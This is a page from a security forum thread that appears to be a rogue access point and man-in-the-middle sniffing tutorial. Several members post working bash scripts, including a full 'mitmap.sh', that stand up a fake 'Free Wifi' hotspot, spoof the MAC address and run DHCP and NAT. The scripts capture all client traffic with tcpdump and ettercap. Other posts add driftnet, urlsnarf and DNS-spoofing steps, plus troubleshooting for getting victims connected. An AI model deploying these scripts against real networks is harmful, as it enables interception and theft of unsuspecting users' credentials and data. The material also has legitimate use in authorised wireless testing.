Page 8 of 14 FirstFirst ... 678910 ... LastLast
Results 71 to 80 of 137

Thread: Rogue Accesspoint + MitM Sniffing tutorial

  1. #71

    Default

    Quote Originally Posted by Revelati View Post
    One last thing HM2075, ive been having some trouble getting that dnspoison program you used to work
    Have you tried dnsspoof? Not having tried this thread's script and attack yet, I can't say for certain what dnspoison is suppose to do, but if it is simple dns redirection for a mitm, then dnsspoof should work fine.

  2. #72

    Default

    well guys here is the script with all the kinks worked out of it. I do have to say that Deathray had the commands down perfectly, I only added a bit of extra logic and checks to what he already did and added the commands for the digininja patched Madwifi kernel modules since they are the ones I used the most and prefer over airbase-ng, just a manner of preference. Thanks again Deathray for such a good simple and straight tutorial, it inspired me to write a good script, before I forget thanks for posting the comment on my blog I was almost considering to give up on it and you posting motivated me to keep writing to it, is those little things that count. Guys test it and let me know if it works for you remember as Deathray mentioned in his tutorial:
    • Have a working dhcpd.conf file with proper dns servers specified
    • Have the latest version or aircrack-ng compiled
    • Have a Wireless card that is supported by aircrack-ng for injection and that it has proper patched modules in BT3

    link to download the script:

    http://www.darkoperator.com/mitmap.tar.gz

    code:

    Code:
    #!/bin/bash
    #=================================================
    #
    # FILE: mitmap.sh
    #
    # USAGE: ./mitmap.sh <options>
    #
    # DESCRIPTION: Script to lunch fake ap for Man In The Middle Attacks
    #
    # OPTIONS: Wireless car supported by Aircrack-ng for injection.
    #	   File with MAC addresses for filtering connection 
    #	   Madwifi Drives Patched with the DigiNinja Karma Patch
    # BUGS: Only has been tested with Atheros, Realteck L8187 and Ralink 2750 cards.
    # NOTES: Latest version of SVN of Aircrack-ng as whell as latest drivers must me used.
    # AUTHOR: carlos_perez(at)darkoperator.com
    # VERSION: 0.1
    # CREATED: 12/27/08 
    # REVISION:
    #=================================================
    #Initialize Wireless interface variable
    IW=
    #Initialize interface to be routed to variable
    IE=
    #Initialize mode variable
    MODE=
    #Initilize SSID variable
    SSID="Free Wifi"
    #Initialize Macfilter file Variable
    FILTER="/noexist"
    #Variable with number of arguments passed to the script
    NUM=$#
    #Variable with log file location for trobleshooting
    LOGFILE=/root/mitmap.log
    #Variable for log folder
    LOGFOLDER="/root/"
    A1="ath0"
    #Variable for dhcpd configuration file
    DHCPDCONF="/etc/dhcpd.conf"
    #Capture crtl-c and it will kill aproceed to clean up any process left 
    trap cleanup INT
    #Usage funtion for printing the help message
    function usage ()
    {
    	echo "Scritp for launching Fake AP to perform Man in The Middle Attack"
    	echo "Based on scritp and Tutorial by Deathrey at http://forums.remote-exploit.org"
    	echo "Usage:"
    	echo "./mitmap.sh -m <mode> -i <wireless interface> -o <internet interface> <options>"
    	echo ""
    	echo "Modes:"
    	echo ""
    	echo "ap		:Access Point using Airbase-ng"
    	echo "apf		:Access Point using Airbase-ng and MAC Filtering"
    	echo "apa		:Access Point using Digininja patched Madwifi kernel modules"
    	echo "apaf		:Access Point using Digininja patched Madwifi Kernel modules and MAC filtering"
    	echo ""
    	echo "Options:"
    	echo ""
    	echo "-s <ssid> 	:SSID to use for the Fake AP"
    	echo "-f <text file>	:text file containing MAC addresses to use as filter one per line"
    	echo "-d <dhcpd conf>	:Dhcpd configuration file"
    	echo "-h 		: This help message"
    }
    #Airbase-ng Karma style interface initialization
    function abngkinit ()
    {
    	if [ $IW == $A1 ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		macchanger -A $IW
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		#macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 10
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    	ifconfig at0 10.0.0.1 netmask 255.255.255.0
    
    }
    #Airbase-ng Karma style interface initialization with MAC Address Filtering
    function abngkinitfiltered ()
    {
    	if [ $IW == $A1 ]; then
    		ifconfig $IW down >> $LOGFILE 2>&1 &
    		wlanconfig ath0 destroy >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A wifi0
    		airmon-ng start wifi0 >> $LOGFILE 2>&1 &
    		sleep 2
    	else
    		ifconfig $IW up >> $LOGFILE 2>&1 &
    		echo -e "\033[1;32mChanging MAC Address\033[1;37m"
    		macchanger -A $IW
    		airmon-ng start $IW >> $LOGFILE 2>&1 &
    		sleep 2
    	fi
    	modprobe tun	
    	echo -e "\033[1;32mstarting fake ap with filtering\033[1;37m"
    	airbase-ng -P -C 30 -e "$SSID" --clients $FILTER $IW >> $LOGFILE 2>&1 &
    	#give enough time before next command for interface to come up
    	#specialy on Virtual Machines with USB cards
    	echo "This will take 15 seconds .............."
    	#$IW = "at0"
    	sleep 15
    	#changing MTU size for Interface
    	echo -e "\033[1;32mChanging MTU Size for At0 to 1400\033[1;37m"
    	ifconfig at0 mtu 1400
    	IW="at0"
    	ifconfig at0 10.0.0.1 netmask 255.255.255.0
    
    }
    #DigiNinja Atheros Karma interface initialization
    function mdwfkinit ()
    {
    	#Based on HD original karmetasploit scripts 
    	find /proc/net -name 'ath?' | sed -e 's/.*ath/ath/g' | xargs -i wlanconfig {} destroy
    	echo Master Mode: `wlanconfig ath0 create wlandev wifi0 wlanmode ap`
    	macchanger -A ath0
    
    	# Enable KARMA mode
    	iwpriv ath0 karma 1
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe Madwifi Drivers appear to not have the karma patch applied\033[1;37m"
    		echo -e "\033[1;31mhttp://www.darkoperator.com/madwifi-r3726-Karma-Aircrack-ng-patched-hdm-i386-1.lzm\033[1;37m"	
    		cleanup
    	else
    		echo -e "\033[1;32mStarting Atheros Card in Karma Mode Succesful\033[1;37m"
    	fi
    
    	# Configure the interface
    	iwconfig ath0 mode master
    	iwconfig ath0 channel 6
    	iwconfig ath0 essid "$SSID"
    	ifconfig ath0 up 10.0.0.1 netmask 255.255.255.0
    
    }
    #DigiNinja Atheros Karma MAC Address Filtering
    function mdwfkinitfiltered ()
    {
    	if [ -e $FILTER ]; then
    		echo -e "\033[1;32mStarting fake ap with MAC Filtering\033[1;37m"
    		for M in `cat $FILTER`; do
    			iwpriv ath0 addmac $M
    		done 
    		iwpriv ath0 maccmd 1
    	else
    		echo -e "\033[1;31mFilter File does not exist\033[1;37m"
    		echo $FILTER
    		#cleanup
    	fi
    }
    #Router with NAT Initialization
    function routerinit ()
    {
    	#Clear any dhcp leases that might have been left behind
    	echo > /var/state/dhcp/dhcpd.leases
    	#start dhcpd daemon with special configuration file
    	dhcpd -cf $DHCPDCONF $IW >> $LOGFILE 2>&1 &
    	if [ $? -ne 0 ] ; then
    		echo -e "\033[1;31mThe DHCPD server could not be started exiting\033[1;37m"
    		cleanup
    	else
    		echo -e "\033[1;32mDHCPD started succesfully\033[1;37m"
    	fi
    	sleep 2
    	#capture all packets
    	echo -e "\033[1;32mStarting Packet capture to ${LOGFOLDER}apmitm.cap\033[1;37m"
    	tcpdump -ni $IW -s 0 -w "${LOGFOLDER}apmitm.cap" >/dev/null 2>&1 &
    	route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	iptables --table nat --delete-chain
    	iptables -P FORWARD ACCEPT
    	iptables -t nat -A POSTROUTING -o $IE -j MASQUERADE
    	echo "1" > /proc/sys/net/ipv4/ip_forward
    	ettercap -T -q -p -u -i $IW && cleanup
    }
    #Cleanup of all running processes
    function cleanup ()
    {
    	iptables --flush
    	iptables --table nat --flush
    	iptables --delete-chain
    	echo "0" > /proc/sys/net/ipv4/ip_forward
    	killall -9 dhcpd tcpdump airbase-ng >> $LOGFILE 2>&1 &
    	echo > /var/state/dhcp/dhcpd.leases
    	airmon-ng stop $IW >> $LOGFILE
    	if [ $MODE == "apa" ] || [ $MODE == "apaf" ]; then
    		iwpriv ath0 maccmd 1 >> $LOGFILE 2>&1 &
    	fi 
    	exit 1
    
    }
    #--------------------MAIN-----------------------
    while getopts ":m:i:f:s:l:o:d:h:" options; do
      case $options in
        m ) MODE=$OPTARG;;
        i ) IW=$OPTARG;;
        f ) FILTER=$OPTARG;;
        s ) SSID=$OPTARG;;
        o ) IE=$OPTARG;;
        d ) DHCPDCONF=$OPTARG;;
        l ) LOGFOLDER=$OPTARG;;
        h ) usage;;
        \? ) usage
             exit 1;;
        * ) usage
              exit 1;;
    
      esac
    done
    echo "finisshed procesing options"
    if [[ -n "$MODE" && -n "$IW" && -n $IE ]]; then
    
    	case $MODE in
    	ap) abngkinit 
         		routerinit;;
    	apf) abngkinitfiltered
          		 routerinit;;
    	apa) mdwfkinit
    		routerinit;;	
    	apaf) mdwfkinit
    		mdwfkinitfiltered
    		routerinit;;	
    	esac
    else
    	usage
    fi

  3. #73
    Junior Member FrankFruter's Avatar
    Join Date
    Dec 2008
    Posts
    29

    Default

    This is what works for me when used with your dhcpd.conf file.

    Wifi Card used for airbase = ath0 Ubiquiti SRC 400 Mini pci
    Wifi Card Out to internet = eth1 ipw2200 Mini pci

    Note: Also use airbase option -I 600 ,This will make the ESSID visible.
    When using Wifi card for out interface,leave out airbase options -P -C 30


    #!/bin/bash
    echo -n "Enter the name of the interface connected to the internet: "
    read -e IFACE
    echo -n "Enter your airbase interface name, for example wlan0: "
    read -e WIFACE
    echo -n "Enter the ESSID you would like your rogue AP to be called: "
    read -e ESSID
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop $WIFACE
    airmon-ng start wifi0
    sleep 5
    modprobe tun
    #xterm -e airbase-ng -e "$ESSID" -I 600 -P -C 30 -v $WIFACE &
    xterm -e airbase-ng -e "$ESSID" -I 600 -v $WIFACE &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    xterm -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    sleep 5
    echo "1" > /proc/sys/net/ipv4/ip_forward
    --------------------------------------------------------
    Starting ettercap GUI after script works well ,i will not affect ip forwarding.
    ettercap > options > unoffensive
    sniff > unified sniffing > at0
    start > start sniffing

    /usr/local/driftnet/driftnet -i at0
    urlsnarf -i at0
    etc...

  4. #74
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    http://dnspentest.sourceforge.net

    go into dir and type

    java ServerKernelMain <Server IP> <IP of fake response>

    waits for udp 53, then redirects

    ip of fake response would be your ip address, server ip would be i guess victim,

    obviously in iptables you need to allow upd 53 to flow other wise it won't make it

  5. #75
    Member
    Join Date
    Jun 2007
    Posts
    218

    Default

    Originally posted by BadKarmaPR

    ettercap -T -q -p -u -i $IW && cleanup
    Is the -p option really needed?

  6. #76
    Just burned his ISO imported_Silver_Seven's Avatar
    Join Date
    Feb 2008
    Posts
    20

    Default

    Quote Originally Posted by =Tron= View Post
    Which part is it that is giving you problems under VMware, ie. how far have you managed to get? I still have yet to experience any real problems with using airbase-ng with my Alfa 500mw under VMware Fusion. I have updated to the latest version of aircrack-ng and am using MTU 1500 on the at0 interface, but apart from that I did not need to make any changes to the script provided by Deathray.
    Hey there Tron, thanx for the reply. Well, the bloody machine is doing the malformed packet thingy when I sniff on the wlan0 interface. Here is my setup as I am running the script hardcoded and manually on my ALPHA:

    kill cat /var/run/dhcpd.pid
    killall -9 dhcpd airbase-ng ettercap
    airmon-ng stop wlan0
    ifconfig wlan0 down
    airmon-ng start wlan0
    modprobe tun
    konsole -e airbase-ng -e "Free_WiFi" -P -C 30 -v wlan0 &
    sleep 10
    ifconfig at0 up
    ifconfig at0 10.0.0.1 netmask 255.255.255.0
    ifconfig at0 mtu 1400
    route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    iptables -P FORWARD ACCEPT
    iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
    echo > '/var/state/dhcp/dhcpd.leases'
    konsole -e dhcpd -d -f -cf /etc/dhcpd.conf at0 &
    konsole -e ettercap -T -q -p -i at0 // // &
    sleep 8
    echo "1" > /proc/sys/net/ipv4/ip_forward



    I got sniffers all over the place here trying to figure it out. One on the sniffers on the VMware box running BT3 shows the client DHCP requesting on bootstrap over the at0 interface, obviously being forwarded from wlan0 which is good. This is also verified by wireshark on the client box trying to get the IP.

    Furthermore, you also see in wireshark the at0 10.0.0.1 router interface ARP broadcastiing to see 10.0.0.254 clear / gratuitous on that local subnet. Then, the gw 10.0.0.1 issues an addy response of 10.0.0.254 layer 3 to bind with the layer 2 MAC for the client. This too is good and makes me even happier to see this verified in the Konsole term windows.

    However, you never see the term windows from Deathray's script register the ACK. Nor do you see this activity at the client sniffer either. You only see that poor client continuing to ask for 0.0.0.0 to 255.255.255.255 DHCP request. Eventually, the stupid winblows box times out and gets handed the 169.x.x.x addy !!!

    So with that in mind, I sniff the wlan0 to see if the traffic is being forwarded from the at0 but I only see malformed packets. This makes me wonder if these are supposed to be the DHCP responses from the gw / ACK to the client giving him the logical addy to his physical MAC.

    Regardless, I have been up for ever working on other client issues too. You ever feel like you never sleep in this industry ........ I will try again tomorrow sometime or so and post some dumps/logs, unless you throw out some ingeniousness that fixes my issue as you often do. In my current state of mind (exhausted), I am whooooopppped, defeated and going to bed ........... :-(

    Thanx again brother and to all a good night !!!

  7. #77
    Just burned his ISO imported_Silver_Seven's Avatar
    Join Date
    Feb 2008
    Posts
    20

    Default

    To let it be known too .......... I have tried the 1500 MTU and removing the -P and -C options as I have an extensive Airespace network up in my lab upstairs !!!

  8. #78
    Member
    Join Date
    Feb 2010
    Posts
    204

    Default

    are you forwarding udp port 53?

  9. #79
    Senior Member
    Join Date
    Apr 2008
    Posts
    2,008

    Default

    Quote Originally Posted by Silver_Seven View Post
    Hey there Tron, thanx for the reply. Well, the bloody machine is doing the malformed packet thingy when I sniff on the wlan0 interface. Here is my setup as I am running the script hardcoded and manually on my ALPHA:
    Your setup looks correct as far as I can see and I am guessing there is no problem with your dhcpd.conf either, seeing as the gateway will issue an IP within the range but the client simply refuses to accept it.

    Quote Originally Posted by Silver_Seven View Post
    However, you never see the term windows from Deathray's script register the ACK. Nor do you see this activity at the client sniffer either. You only see that poor client continuing to ask for 0.0.0.0 to 255.255.255.255 DHCP request. Eventually, the stupid winblows box times out and gets handed the 169.x.x.x addy !!!
    Are you trying to spoof an existing AP, i.e. would the client have any reason to try to obtain a previously used IP outside of 10.0.0.X? Have you tried to manually assign an IP on the client machine using an IP within the range? Adding the following iptables rule could also be helpful if this is the issue:
    Code:
    iptables -t nat -A PREROUTING -i at0 -j REDIRECT
    Quote Originally Posted by Silver_Seven View Post
    So with that in mind, I sniff the wlan0 to see if the traffic is being forwarded from the at0 but I only see malformed packets. This makes me wonder if these are supposed to be the DHCP responses from the gw / ACK to the client giving him the logical addy to his physical MAC.
    I get this when sniffing on the wlan0 interface under VMware as well, simply use the at0 interface instead as all traffic will go through this interface anyway.

    Quote Originally Posted by Silver_Seven View Post
    Regardless, I have been up for ever working on other client issues too. You ever feel like you never sleep in this industry
    Only all the time.
    -Monkeys are like nature's humans.

  10. #80

    Default

    Quote Originally Posted by level View Post
    Is the -p option really needed?
    what we are doing is telling it not to put the interface in promisc mode since it is not necessary to do so since it is already seeing all the traffic.

    -p, --nopromisc
    Usually, ettercap will put the interface in promisc mode to sniff all the traffic on the wire. If you want to sniff only your connections, use this flag to NOT enable the promisc mode.

Page 8 of 14 FirstFirst ... 678910 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •